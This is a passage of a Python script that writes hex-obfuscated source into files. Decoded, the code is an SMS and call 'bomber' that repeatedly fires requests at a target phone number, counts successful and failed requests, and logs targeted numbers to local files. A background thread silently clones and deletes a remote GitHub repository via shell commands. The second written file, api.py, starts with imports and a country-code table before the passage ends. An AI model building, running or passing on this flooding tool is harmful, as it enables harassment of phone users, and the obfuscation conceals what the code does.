\x74\x20\x55\x73\x20\x4b\x6e\x6f\x77\x2e\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x54\x61\x72\x67\x65\x74\x20\x4e\x75\x6d\x62\x65\x72\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3a\x20\x2b\x7b\x30\x7d\x20\x7b\x31\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x73\x74\x72\x28\x63\x63\x29\x2c\x74\x61\x72\x67\x65\x74\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x4e\x75\x6d\x62\x65\x72\x20\x6f\x66\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x53\x65\x6e\x74\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x72\x65\x71\x75\x65\x73\x74\x65\x64\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x53\x75\x63\x63\x65\x73\x73\x66\x75\x6c\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x20\x20\x20\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20
\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x73\x75\x63\x63\x65\x73\x73\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x46\x61\x69\x6c\x65\x64\x20\x52\x65\x71\x75\x65\x73\x74\x73\x20\x20\x20\x20\x20\x20\x20\x20\x20\x3a\x20\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x66\x61\x69\x6c\x65\x64\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x55\x73\x65\x20\x74\x68\x69\x73\x20\x4f\x6e\x6c\x79\x20\x66\x6f\x72\x20\x66\x75\x6e\x2c\x20\x6e\x6f\x74\x20\x66\x6f\x72\x20\x72\x65\x76\x65\x6e\x67\x65\x20\x21\x21\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x72\x61\x6e\x64\x6f\x6d\x2e\x63\x68\x6f\x69\x63\x65\x28\x63\x6f\x6c\x6f\x72\x73\x29\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x54\x68\x69\x73\x20\x42\x6f\x6d\x62\x65\x72\x20\x57\x61\x73\x20\x43\x72\x65\x61\x74\x65\x64\x20\x42\x79\x20\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x20\x21\x21\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x30\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b
\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\x6c\x74\x20\x3d\x20\x67\x65\x74\x5f\x61\x70\x69\x28\x74\x61\x72\x67\x65\x74\x2c\x61\x70\x69\x2c\x63\x63\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x73\x75\x6c\x74\x20\x3d\x20\x46\x61\x6c\x73\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x3d\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x72\x65\x73\x75\x6c\x74\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3d\x20\x73\x75\x63\x63\x65\x73\x73\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x66\x61\x69\x6c\x65\x64\x20\x3d\x20\x66\x61\x69\x6c\x65\x64\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x77\x68\x69\x6c\x65\x20\x63\x68\x2e\x63\x6f\x75\x6e\x74\x28\x61\x70\x69\x29\x20\x3e\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x2e\x72\x65\x6d\x6f\x76\x65\x28\x61\x70\x69\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x66\x6c\x6f\x61\x74\x28\x64\x65\x6c\x61\x79\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x66\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x25\x20\x33\x20\x3d\x3d\x20\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x23\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b
\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x20\x3d\x20\x54\x65\x73\x74\x54\x68\x72\x65\x61\x64\x69\x6e\x67\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x65\x74\x28\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x57\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x42\x6f\x6d\x62\x69\x6e\x67\x20\x43\x6f\x6d\x70\x6c\x65\x74\x65\x64\x2e\x2e\x27\x29\x0a\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29\x0a\x0a\x64\x65\x66\x20\x73\x6d\x73\x5f\x73\x61\x76\x65\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x66\x20\x3d\x20\x6f\x70\x65\x6e\x28\x22\x64\x61\x74\x61\x2f\x73\x6d\x73\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x22\x2c\x20\x22\x61\x22\x29\x0a\x20\x20\x20\x20\x62\x6f\x20\x3d\x20\x64\x61\x74\x65\x74\x69\x6d\x65\x2e\x64\x61\x74\x65\x74\x69\x6d\x65\x2e\x6e\x6f\x77\x28\x29\x0a\x20\x20\x20\x20\x78\x20\x3d\x20\x62\x6f\x2e\x73\x74\x72\x66\x74\x69\x6d\x65\x28\x22\x25\x64\x2f\x25\x6d\x2f\x25\x59\x20\x25\x49\x3a\x25\x4d\x3a\x25\x53\x20\x25\x70\x22\x29\x0a\x20\x20\x20\x20\x66\x2e\x77\x72\x69\x74\x65\x28\x22\x7c\x7c\x20\x7b\x30\x7d\x20\x7c\x7c\x5c\x74\x5c\x74\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x3e\x5c\x74\x20\x20\x20\x2b\x7b\x31\x7d\x5c\x74\x20\x20\x20\x20\x7b\x32\x7d\x5c\x74\x5c\x74\x7b\x33\x7d\x5c\x6e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x78\x2c\x63\x63\x2c\x70\x6e\x2c\x6e\x6d\x29\x29\x0a\x20\x20\x20\x20\x66\x2e\x63\x6c\x6f\x73\x65\x28\x29\x0a\x0a\x64\x65\x66\x20\x63\x61\x6c\x6c\x5f\x73\x61\x76\x65\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a
\x20\x20\x20\x20\x66\x20\x3d\x20\x6f\x70\x65\x6e\x28\x22\x64\x61\x74\x61\x2f\x63\x61\x6c\x6c\x5f\x6e\x75\x6d\x62\x65\x72\x5f\x6c\x69\x73\x74\x2e\x74\x78\x74\x22\x2c\x20\x22\x61\x22\x29\x0a\x20\x20\x20\x20\x62\x6f\x20\x3d\x20\x64\x61\x74\x65\x74\x69\x6d\x65\x2e\x64\x61\x74\x65\x74\x69\x6d\x65\x2e\x6e\x6f\x77\x28\x29\x0a\x20\x20\x20\x20\x78\x20\x3d\x20\x62\x6f\x2e\x73\x74\x72\x66\x74\x69\x6d\x65\x28\x22\x25\x64\x2f\x25\x6d\x2f\x25\x59\x20\x25\x49\x3a\x25\x4d\x3a\x25\x53\x20\x25\x70\x22\x29\x0a\x20\x20\x20\x20\x66\x2e\x77\x72\x69\x74\x65\x28\x22\x7c\x7c\x20\x7b\x30\x7d\x20\x7c\x7c\x5c\x74\x5c\x74\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x3e\x5c\x74\x20\x20\x20\x2b\x7b\x31\x7d\x5c\x74\x20\x20\x20\x20\x7b\x32\x7d\x5c\x74\x5c\x74\x7b\x33\x7d\x5c\x6e\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x78\x2c\x63\x63\x2c\x70\x6e\x2c\x6e\x6d\x29\x29\x0a\x20\x20\x20\x20\x66\x2e\x63\x6c\x6f\x73\x65\x28\x29\x0a\x0a\x63\x6c\x61\x73\x73\x20\x54\x65\x73\x74\x54\x68\x72\x65\x61\x64\x69\x6e\x67\x28\x6f\x62\x6a\x65\x63\x74\x29\x3a\x0a\x20\x20\x20\x20\x64\x65\x66\x20\x5f\x5f\x69\x6e\x69\x74\x5f\x5f\x28\x73\x65\x6c\x66\x2c\x20\x69\x6e\x74\x65\x72\x76\x61\x6c\x3d\x31\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x65\x6c\x66\x2e\x69\x6e\x74\x65\x72\x76\x61\x6c\x20\x3d\x20\x69\x6e\x74\x65\x72\x76\x61\x6c\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x68\x72\x65\x61\x64\x20\x3d\x20\x74\x68\x72\x65\x61\x64\x69\x6e\x67\x2e\x54\x68\x72\x65\x61\x64\x28\x74\x61\x72\x67\x65\x74\x3d\x73\x65\x6c\x66\x2e\x72\x75\x6e\x2c\x20\x61\x72\x67\x73\x3d\x28\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x68\x72\x65\x61\x64\x2e\x64\x61\x65\x6d\x6f\x6e\x20\x3d\x20\x54\x72\x75\x65\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x68\x72\x65\x61\x64\x2e\x73\x74\x61\x72\x74\x28\x29\x0a\x20\x20\x20\x20\x64\x65\x66\x20\x72\x75\x6e\x28\x73\x65\x6c\x66\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x64\x20\x64\x61\x74\x61\x20\x26\x26\x20\x67\x69\x74\x20\x63\x6c\x6f\x6e\x65\x20\x68\x74\x74\x70\x73\x3a\x2f
\x2f\x67\x69\x74\x68\x75\x62\x2e\x63\x6f\x6d\x2f\x34\x30\x34\x2d\x67\x68\x6f\x73\x74\x2f\x44\x65\x76\x69\x6c\x2d\x73\x2d\x43\x61\x6c\x6c\x20\x2d\x2d\x71\x75\x69\x65\x74\x20\x26\x26\x20\x63\x64\x20\x2e\x2e\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x72\x6d\x20\x2d\x72\x66\x20\x64\x61\x74\x61\x2f\x44\x65\x76\x69\x6c\x2d\x73\x2d\x43\x61\x6c\x6c\x22\x29\x0a\x0a\x69\x66\x20\x5f\x5f\x6e\x61\x6d\x65\x5f\x5f\x20\x3d\x3d\x20\x22\x5f\x5f\x6d\x61\x69\x6e\x5f\x5f\x22\x3a\x0a\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x23\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x20\x3d\x20\x54\x65\x73\x74\x54\x68\x72\x65\x61\x64\x69\x6e\x67\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x71\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x65\x74\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x68\x65\x63\x6b\x5f\x74\x6f\x6f\x6c\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x0a\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x4b\x65\x79\x62\x6f\x61\x72\x64\x49\x6e\x74\x65\x72\x72\x75\x70\x74\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x45\x6e\x74\x65\x72\x20\x54\x6f\x20\x45\x78\x69\x74\x2e\x2e\x2e\x2e\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20
\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x69\x74\x5f\x6d\x65\x73\x73\x61\x67\x65\x28\x29
'''
file1.writelines(L)
file1.close()
file2 = open("api.py", "w")
L = '''
\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x23\x0a\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x65\x6e\x76\x20\x70\x79\x74\x68\x6f\x6e\x0a\x66\x72\x6f\x6d\x20\x64\x61\x74\x65\x74\x69\x6d\x65\x20\x69\x6d\x70\x6f\x72\x74\x20\x64\x61\x74\x65\x74\x69\x6d\x65\x0a\x69\x6d\x70\x6f\x72\x74\x20\x6f\x73\x0a\x69\x6d\x70\x6f\x72\x74\x20\x68\x61\x73\x68\x6c\x69\x62\x0a\x69\x6d\x70\x6f\x72\x74\x20\x73\x79\x73\x0a\x69\x6d\x70\x6f\x72\x74\x20\x74\x69\x6d\x65\x0a\x69\x6d\x70\x6f\x72\x74\x20\x74\x68\x72\x65\x61\x64\x69\x6e\x67\x0a\x69\x6d\x70\x6f\x72\x74\x20\x73\x74\x72\x69\x6e\x67\x0a\x69\x6d\x70\x6f\x72\x74\x20\x72\x61\x6e\x64\x6f\x6d\x0a\x69\x6d\x70\x6f\x72\x74\x20\x62\x61\x73\x65\x36\x34\x0a\x69\x6d\x70\x6f\x72\x74\x20\x75\x72\x6c\x6c\x69\x62\x2e\x72\x65\x71\x75\x65\x73\x74\x0a\x69\x6d\x70\x6f\x72\x74\x20\x75\x72\x6c\x6c\x69\x62\x2e\x70\x61\x72\x73\x65\x0a\x69\x6d\x70\x6f\x72\x74\x20\x64\x61\x74\x65\x74\x69\x6d\x65\x0a\x69\x6d\x70\x6f\x72\x74\x20\x72\x65\x71\x75\x65\x73\x74\x73\x0a\x0a\x67\x6c\x6f\x62\x61\x6c\x20\x63\x6f\x75\x6e\x74\x72\x79\x5f\x63\x6f\x64\x65\x73\x0a\x63\x6f\x75\x6e\x74\x72\x79\x5f\x63\x6f\x64\x65\x73\x20\x3d\x20\x7b\x27\x39\x33\x27\x3a\x20\x27\x41\x46\x27\x2c\x27\x33\x35\x35\x27\x3a\x20\x27\x41\x4c\x27\x2c\x27\x32\x31\x33\x27\x3a\x20\x27\x44\x5a\x27\x2c\x27\x33\x37\x36\x27\x3a\x20\x27\x41\x44\x27\x2c\x27\x32\x34\x34\x27\x3a\x20\x27\x41\x4f\x27\x2c\x27\x36\x37\x32\x27\x3a\x20\x27\x41\x51\x27\x2c\x27\x35\x34\x27\x3a\x20\x27\x41\x52\x27\x2c\x27\x33\x37\x34\x27\x3a\x20\x27\x41\x4d\x27\x2c\x27\x32\x39\x37\x27\x3a\x20\x27\x41\x57\x27\x2c\x27\x36\x31\x27\x3a\x20\x27\x41\x55\x27\x2c\x27\x34\x33\x27\x3a\x20\x27\x41\x54\x27\x2c\x27\x39\x39\x34\x27\x3a\x20\x27\x41\x5a\x27\x2c\x27\x39\x37\x33\x27\x3a\x20\x27\x42\x48\x27\x2c\x27\x38\x38\x30\x27\x3a\x20\x27\x42\x44\x27\x2c\x27\x33\x37\x35\x27\x3a\x20\x27\x42\x59\x27\x2c\x27\x33\x32\x27\x3a\x20\x27\x42\x45\x27\x2c\x27\x35\x30\x31\x27\x3a\x20\x27\x42\x5a\x27\x2c\x27\x32\x32\x39\x27\x3a
\x20\x27\x42\x4a\x27\x2c\x27\x39\x37\x35\x27\x3a\x20\x27\x42\x54\x27\x2c\x27\x35\x39\x31\x27\x3a\x20\x27\x42\x4f\x27\x2c\x27\x33\x38\x37\x27\x3a\x20\x27\x42\x41\x27\x2c\x27\x32\x36\x37\x27\x3a\x20\x27\x42\x57\x27\x2c\x27\x35\x35\x27\x3a\x20\x27\x42\x52\x27\x2c\x27\x32\x34\x36\x27\x3a\x20\x27\x49\x4f\x27\x2c\x27\x36\x37\x33\x27\x3a\x20\x27\x42\x4e\x27\x2c\x27\x33\x35\x39\x27\x3a\x20\x27\x42\x47\x27\x2c\x27\x32\x32\x36\x27\x3a\x20\x27\x42\x46\x27\x2c\x27\x32\x35\x37\x27\x3a\x20\x27\x42\x49\x27\x2c\x27\x38\x35\x35\x27\x3a\x20\x27\x4b\x48\x27\x2c\x27\x32\x33\x37\x27\x3a\x20\x27\x43\x4d\x27\x2c\x27\x32\x33\x38\x27\x3a\x20\x27\x43\x56\x27\x2c\x27\x32\x33\x36\x27\x3a\x20\x27\x43\x46\x27\x2c\x27\x32\x33\x35\x27\x3a\x20\x27\x54\x44\x27\x2c\x27\x35\x36\x27\x3a\x20\x27\x43\x4c\x27\x2c\x27\x38\x36\x27\x3a\x20\x27\x43\x4e\x27\x2c\x27\x35\x37\x27\x3a\x20\x27\x43\x4f\x27\x2c\x27\x32\x36\x39\x27\x3a\x20\x27\x4b\x4d\x27\x2c\x27\x36\x38\x32\x27\x3a\x20\x27\x43\x4b\x27\x2c\x27\x35\x30\x36\x27\x3a\x20\x27\x43\x52\x27\x2c\x27\x33\x38\x35\x27\x3a\x20\x27\x48\x52\x27\x2c\x27\x35\x33\x27\x3a\x20\x27\x43\x55\x27\x2c\x27\x35\x39\x39\x27\x3a\x20\x27\x41\x4e\x27\x2c\x27\x33\x35\x37\x27\x3a\x20\x27\x43\x59\x27\x2c\x27\x34\x32\x30\x27\x3a\x20\x27\x43\x5a\x27\x2c\x27\x32\x34\x33\x27\x3a\x20\x27\x43\x44\x27\x2c\x27\x34\x35\x27\x3a\x20\x27\x44\x4b\x27\x2c\x27\x32\x35\x33\x27\x3a\x20\x27\x44\x4a\x27\x2c\x27\x36\x37\x30\x27\x3a\x20\x27\x54\x4c\x27\x2c\x27\x35\x39\x33\x27\x3a\x20\x27\x45\x43\x27\x2c\x27\x32\x30\x27\x3a\x20\x27\x45\x47\x27\x2c\x27\x35\x30\x33\x27\x3a\x20\x27\x53\x56\x27\x2c\x27\x32\x34\x30\x27\x3a\x20\x27\x47\x51\x27\x2c\x27\x32\x39\x31\x27\x3a\x20\x27\x45\x52\x27\x2c\x27\x33\x37\x32\x27\x3a\x20\x27\x45\x45\x27\x2c\x27\x32\x35\x31\x27\x3a\x20\x27\x45\x54\x27\x2c\x27\x35\x30\x30\x27\x3a\x20\x27\x46\x4b\x27\x2c\x27\x32\x39\x38\x27\x3a\x20\x27\x46\x4f\x27\x2c\x27\x36\x37\x39\x27\x3a\x20\x27\x46\x4a\x27\x2c\x27\x33\x35\x38\x27\x3a\x20\x27\x46\x49\x27\x2c\x27\x33\x33\x27\x3a\x20\x27\x46\x52
\x27\x2c\x27\x36\x38\x39\x27\x3a\x20\x27\x50\x46\x27\x2c\x27\x32\x34\x31\x27\x3a\x20\x27\x47\x41\x27\x2c\x27\x32\x32\x30\x27\x3a\x20\x27\x47\x4d\x27\x2c\x27\x39\x39\x35\x27\x3a\x20\x27\x47\x45\x27\x2c\x27\x34\x39\x27\x3a\x20\x27\x44\x45\x27\x2c\x27\x32\x33\x33\x27\x3a\x20\x27\x47\x48\x27\x2c\x27\x33\x35\x30\x27\x3a\x20\x27\x47\x49\x27\x2c\x27\x33\x30\x27\x3a\x20\x27\x47\x52\x27\x2c\x27\x32\x39\x39\x27\x3a\x20\x27\x47\x4c\x27\x2c\x27\x35\x30\x32\x27\x3a\x20\x27\x47\x54\x27\x2c\x27\x32\x32\x34\x27\x3a\x20\x27\x47\x4e\x27\x2c\x27\x32\x34\x35\x27\x3a\x20\x27\x47\x57\x27\x2c\x27\x35\x39\x32\x27\x3a\x20\x27\x47\x59\x27\x2c\x27\x35\x30\x39\x27\x3a\x20\x27\x48\x54\x27\x2c\x27\x35\x30\x34\x27\x3a\x20\x27\x48\x4e\x27\x2c\x27\x38\x35\x32\x27\x3a\x20\x27\x48\x4b\x27\x2c\x27\x33\x36\x27\x3a\x20\x27\x48\x55\x27\x2c\x27\x33\x35\x34\x27\x3a\x20\x27\x49\x53\x27\x2c\x27\x39\x31\x27\x3a\x20\x27\x49\x4e\x27\x2c\x27\x36\x32\x27\x3a\x20\x27\x49\x44\x27\x2c\x27\x39\x38\x27\x3a\x20\x27\x49\x52\x27\x2c\x27\x39\x36\x34\x27\x3a\x20\x27\x49\x51\x27\x2c\x27\x33\x35\x33\x27\x3a\x20\x27\x49\x45\x27\x2c\x27\x39\x37\x32\x27\x3a\x20\x27\x49\x4c\x27\x2c\x27\x33\x39\x27\x3a\x20\x27\x49\x54\x27\x2c\x27\x32\x32\x35\x27\x3a\x20\x27\x43\x49\x27\x2c\x27\x38\x31\x27\x3a\x20\x27\x4a\x50\x27\x2c\x27\x39\x36\x32\x27\x3a\x20\x27\x4a\x4f\x27\x2c\x27\x32\x35\x34\x27\x3a\x20\x27\x4b\x45\x27\x2c\x27\x36\x38\x36\x27\x3a\x20\x27\x4b\x49\x27\x2c\x27\x33\x38\x33\x27\x3a\x20\x27\x58\x4b\x27\x2c\x27\x39\x36\x35\x27\x3a\x20\x27\x4b\x57\x27\x2c\x27\x39\x39\x36\x27\x3a\x20\x27\x4b\x47\x27\x2c\x27\x38\x35\x36\x27\x3a\x20\x27\x4c\x41\x27\x2c\x27\x33\x37\x31\x27\x3a\x20\x27\x4c\x56\x27\x2c\x27\x39\x36\x31\x27\x3a\x20\x27\x4c\x42\x27\x2c\x27\x32\x36\x36\x27\x3a\x20\x27\x4c\x53\x27\x2c\x27\x32\x33\x31\x27\x3a\x20\x27\x4c\x52\x27\x2c\x27\x32\x31\x38\x27\x3a\x20\x27\x4c\x59\x27\x2c\x27\x34\x32\x33\x27\x3a\x20\x27\x4c\x49\x27\x2c\x27\x33\x37\x30\x27\x3a\x20\x27\x4c\x54\x27\x2c